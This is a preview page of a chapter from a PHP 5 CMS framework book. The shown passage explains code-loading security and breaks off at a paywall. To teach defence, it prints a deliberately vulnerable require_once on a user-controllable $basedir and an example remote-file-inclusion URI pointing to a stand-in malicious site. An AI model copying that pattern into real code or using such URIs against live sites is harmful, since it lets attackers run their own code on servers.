Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Conferences
Free Learning
Arrow right icon
Arrow up icon
GO TO TOP
PHP 5 CMS Framework Development - 2nd Edition

You're reading from   PHP 5 CMS Framework Development - 2nd Edition For professional PHP developers, this is the perfect guide to web-oriented frameworks and content management systems. Covers all the critical design issues and programming techniques in an easy-to-follow style and structure.

Arrow left icon
Product type Paperback
Published in Aug 2010
Publisher Packt
ISBN-13 9781849511346
Length 416 pages
Edition 1st Edition
Languages
Tools
Concepts
Arrow right icon
Author (1):
Arrow left icon
Martin Brampton Martin Brampton
Author Profile Icon Martin Brampton
Martin Brampton
Arrow right icon
View More author details
Toc

Table of Contents (24) Chapters Close

PHP 5 CMS Framework Development
Second Edition
Credits
About the Author
1. Acknowledgement
About the Reviewers
2. Preface
1. CMS Architecture FREE CHAPTER 2. Organizing Code 3. Database and Data Objects 4. Administrators, Users, and Guests 5. Sessions and Users 6. Caches and Handlers 7. Access Control 8. Handling Extensions 9. Menus 10. Languages 11. Presentation Services 12. Other Services 13. SEF and RESTful Services 14. Error Handling 15. Real Content Packaging Extensions
Packaging XML Example

Discussion and considerations


Code needs to be loaded, and this does not happen automatically without some effort on our part. The loading of code has the potential to raise serious security issues that must be tackled. There are also practical matters of how to make code as clean and efficient as possible.

Security

There has been a spate of cracks exploiting code-loading loopholes. Suppose we have a file containing PHP that is intended to be loaded for execution by other code that was triggered by the request from a user's browser. A simplified example would be:

<?php
require_once ($basedir.'/somecode.php');
// More code that is perfectly safe follows
?>

First, how does the crack work? Supposing the previous code is in a file called vulnerablecode.php, and the URI used by the cracker is something like the following: http://www.goodexample.com/pathtovulnerablecode/vulnerablecode.php?basedir=http://www.nastysite.com?.

The result is that our vulnerable code tries to load, and execute http...

lock icon The rest of the chapter is locked
Register for a free Packt account to unlock a world of extra content!
A free Packt account unlocks extra newsletters, articles, discounted offers, and much more. Start advancing your knowledge today.
Unlock this book and the full library FREE for 7 days
Get unlimited access to 7000+ expert-authored eBooks and videos courses covering every tech area you can think of
Renews at $19.99/month. Cancel anytime
Banner background image